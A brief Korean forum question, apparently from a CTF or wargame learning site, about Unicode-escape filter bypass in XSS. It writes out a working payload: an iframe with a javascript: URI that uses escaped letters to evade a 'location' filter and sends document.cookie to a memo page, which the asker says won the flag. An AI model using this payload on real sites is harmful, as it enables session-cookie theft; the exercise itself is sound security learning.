완료됨
유니코드 우회에서 질문이 있습니다.
공격 페이로드를 param=<iframe+src%3d"javascr ipt%3alocati\u006f\u006e.href%3d' /memo%3fmemo%3d'%2bd\u006fcument.co\u006fkie"/> 이렇게 작성해서 플래그를 획득했는데,
근데 location을 우회할 때 2번째 글자 'o'를 우회하여
l\u006fcation 으로 우회하면 플래그 획득이 안 되고
locati\u006fn 혹은 locati\u006f\u006e 이렇게 해야지만 플래그가 획득되는데 이유가 뭘까요?
#web
